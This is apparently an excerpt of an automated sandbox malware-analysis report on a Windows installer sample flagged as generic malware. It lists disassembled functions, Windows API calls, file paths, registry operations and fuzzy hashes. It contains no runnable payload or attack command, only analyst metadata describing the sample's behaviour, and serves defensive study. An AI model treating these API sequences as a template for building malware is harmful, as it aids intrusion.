                                                                        • String ID: ... %d%%$0A$H.B
                                                                        • API String ID: 551687249-3873104639
                                                                        • Opcode ID: ede1e8e15d747a91ca4de53f89313a3819b99860a5cad6c8dedb11164fc401f9
                                                                        • Instruction ID: cc32688fb846b20799601ecf4724bdf5f6a604bb501928ae6cb5e0d1b862edc2
                                                                        • Opcode Fuzzy Hash: ede1e8e15d747a91ca4de53f89313a3819b99860a5cad6c8dedb11164fc401f9
                                                                        • Instruction Fuzzy Hash: 10517C71800219ABDB10DFA5DA8469F7BB8EF44766F14817BEC41B72D0C7389A50CBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004065F5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 845 4065f5-406615 GetSystemDirectoryA 846 406617 845->846 847 406619-40661b 845->847 846->847 848 40662b-40662d 847->848 849 40661d-406625 847->849 851 40662e-406660 wsprintfA LoadLibraryExA 848->851 849->848 850 406627-406629 849->850 850->851
                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040660C
                                                                        • wsprintfA.USER32 ref: 00406645
                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                        • API String ID: 2200240437-4240819195
                                                                        • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                        • Instruction ID: 9f789840e0b15416ae64874b5c60068ae2f650887ed5db1015d4ebb1f4ad26b2
                                                                        • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                        • Instruction Fuzzy Hash: 12F0213051060A67DB14A764DD0DFFB3B5CEB08304F14047EA586F10C1DAB9D5358B5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040583E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 852 40583e-405889 CreateDirectoryA 853 40588b-40588d 852->853 854 40588f-40589c GetLastError 852->854 855 4058b6-4058b8 853->855 854->855 856 40589e-4058b2 SetFileSecurityA 854->856 856->853 857 4058b4 GetLastError 856->857 857->855
                                                                        APIs
                                                                        • CreateDirectoryA.KERNELBASE(?,0000000B,C:\Users\user\AppData\Local\Temp\), ref: 00405881
                                                                        • GetLastError.KERNEL32 ref: 00405895
                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058AA
                                                                        • GetLastError.KERNEL32 ref: 004058B4
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405864
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 3449924974-2145255484
                                                                        • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                        • Instruction ID: 2f5b217c954ff7fbb4119b01485a045b77912d3f79ec2e58d5a645a6a403fb95
                                                                        • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                        • Instruction Fuzzy Hash: A7010872C00219EAEF00DBA1C944BEFBBB8EF04355F00803AD945B6290E7789658CB99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 858 401c2e-401c4e call 402c17 * 2 863 401c50-401c57 call 402c39 858->863 864 401c5a-401c5e 858->864 863->864 866 401c60-401c67 call 402c39 864->866 867 401c6a-401c70 864->867 866->867 870 401c72-401c8e call 402c17 * 2 867->870 871 401cbe-401ce4 call 402c39 * 2 FindWindowExA 867->871 881 401c90-401cac SendMessageTimeoutA 870->881 882 401cae-401cbc SendMessageA 870->882 883 401cea 871->883 884 401ced-401cf0 881->884 882->883 883->884 885 402ac5-402ad4 884->885 886 401cf6 884->886 886->885
                                                                        APIs
                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: 60960b56f400513723277229af694750ddbbe590db3b19512bd1bbbb0dd5075d
                                                                        • Instruction ID: 6395210313b5e96ec4903c6722a9a41e79e60401c6fef9bd0231d245bd3396c8
                                                                        • Opcode Fuzzy Hash: 60960b56f400513723277229af694750ddbbe590db3b19512bd1bbbb0dd5075d
                                                                        • Instruction Fuzzy Hash: 56218571948208BEEB059FF5D986AAD7FB4EF44304F10447EF101B61D1D7B989819B18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405E19 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 889 405e19-405e23 890 405e24-405e4f GetTickCount GetTempFileNameA 889->890 891 405e51-405e53 890->891 892 405e5e-405e60 890->892 891->890 893 405e55 891->893 894 405e58-405e5b 892->894 893->894
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405E2D
                                                                        • GetTempFileNameA.KERNELBASE(0000000B,?,00000000,?,?,004033B1,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007), ref: 00405E47
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                        • API String ID: 1716503409-386316673
                                                                        • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                        • Instruction ID: db84433a099d66a6ad53f3418d19e52f8fbd3804b66164b4918815a523437c08
                                                                        • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                        • Instruction Fuzzy Hash: 9CF0A736348208BBEB109F56ED04B9B7B9CDF91B50F10C03BFA84DB180D6B5DA548798
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004020A5 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020D0
                                                                          • Part of subcall function 00405378: lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                                          • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                                          • Part of subcall function 00405378: lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,0040329E,0040329E,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0), ref: 004053D4
                                                                          • Part of subcall function 00405378: SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll), ref: 004053E6
                                                                          • Part of subcall function 00405378: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540C
                                                                          • Part of subcall function 00405378: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405426
                                                                          • Part of subcall function 00405378: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405434
                                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020E0
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020F0
                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040215A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 2987980305-0
                                                                        • Opcode ID: 5a96ab6c176026598fe3d54266224e5e5ed6545b4eadb25d5a8982baf4d6426a
                                                                        • Instruction ID: 3c6328a696446079fc2d308fbd04895e9a1cd4fdde8666fe7d5c2d170abc5611
                                                                        • Opcode Fuzzy Hash: 5a96ab6c176026598fe3d54266224e5e5ed6545b4eadb25d5a8982baf4d6426a
                                                                        • Instruction Fuzzy Hash: 7721F631904215E7CF207FA58F4DAAF3670AF54358F60423BF601B61E0DAFD49819A6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00405C82: CharNextA.USER32(?,?,0042BC98,0000000B,00405CEE,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405C90
                                                                          • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                                          • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                          • Part of subcall function 0040583E: CreateDirectoryA.KERNELBASE(?,0000000B,C:\Users\user\AppData\Local\Temp\), ref: 00405881
                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende,00000000,00000000,000000F0), ref: 0040163C
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende, xrefs: 00401631
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende
                                                                        • API String ID: 1892508949-1242700388
                                                                        • Opcode ID: b6a48ce52f76c1b375cba19854813e09be2f57adb9555eb69d8c4fa29f7fc4bc
                                                                        • Instruction ID: 7a2b8dfd757742e83ffe6dd7df5b12a9f5db33ee71018b299411addc72821366
                                                                        • Opcode Fuzzy Hash: b6a48ce52f76c1b375cba19854813e09be2f57adb9555eb69d8c4fa29f7fc4bc
                                                                        • Instruction Fuzzy Hash: 54110431508141EBDF307BA54D409BF27B49A96324B68453FF9D1B22E2DA3D4942AA3E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040251E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040254E
                                                                        • RegCloseKey.ADVAPI32(?,?,?,0040AC38,00000000,00000011,00000002), ref: 004025ED
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3356406503-0
                                                                        • Opcode ID: 614ef133c6cbac83c15d29c2db6c6372e35b3af024f3350696efae1b8ce031cc
                                                                        • Instruction ID: 02260f91894b81efdf071d6bf66139ec23fd99d5adfc3060dafb801450c89547
                                                                        • Opcode Fuzzy Hash: 614ef133c6cbac83c15d29c2db6c6372e35b3af024f3350696efae1b8ce031cc
                                                                        • Instruction Fuzzy Hash: 3911BF71905205FFDB25CF64DA989AE7AB4AF01355F20483FE042B72C0D6B88A85DA6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 6d6c05e2d17e61aa35ed6ac458fea53b968503eb473f312dedad9b12065ca57f
                                                                        • Instruction ID: 2b84f8aef59f8f821fe865236d11139dc57ce13a72bb3d14165ba5b6471e206c
                                                                        • Opcode Fuzzy Hash: 6d6c05e2d17e61aa35ed6ac458fea53b968503eb473f312dedad9b12065ca57f
                                                                        • Instruction Fuzzy Hash: B101D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402429 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040244A
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402453
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteValue
                                                                        • String ID:
                                                                        • API String ID: 2831762973-0
                                                                        • Opcode ID: bde766d8a503c3a1f1c2ee30d65442b77762dc6f840c34741ac6711ff670c9ae
                                                                        • Instruction ID: c9f6a0f756bffd6fe36e262df4a8f1e623fbd2bf401ec17ba930b5ce720ddf8f
                                                                        • Opcode Fuzzy Hash: bde766d8a503c3a1f1c2ee30d65442b77762dc6f840c34741ac6711ff670c9ae
                                                                        • Instruction Fuzzy Hash: B7F09632A04121ABE720ABB59B8EDAE62A89B50314F65443FF602B71C1D9F84D42566E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040156F Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShowWindow.USER32(0001048A), ref: 00401581
                                                                        • ShowWindow.USER32(00010484), ref: 00401596
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ShowWindow
                                                                        • String ID:
                                                                        • API String ID: 1268545403-0
                                                                        • Opcode ID: 71b70274894262a9e0b78aae7c73bb9e80b78445945a1233e84b1a75d5d2188e
                                                                        • Instruction ID: cca44e48cc00dd3f2550ee43bfc29e9cf7f7b7f5bd80dc626c9b6d3a8a91cf8a
                                                                        • Opcode Fuzzy Hash: 71b70274894262a9e0b78aae7c73bb9e80b78445945a1233e84b1a75d5d2188e
                                                                        • Instruction Fuzzy Hash: B6E08676B10110ABC724CFA4ED9087F73A5EB843203A4043FE502B3290CA74AC018E78
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406663 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                                          • Part of subcall function 004065F5: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040660C
                                                                          • Part of subcall function 004065F5: wsprintfA.USER32 ref: 00406645
                                                                          • Part of subcall function 004065F5: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
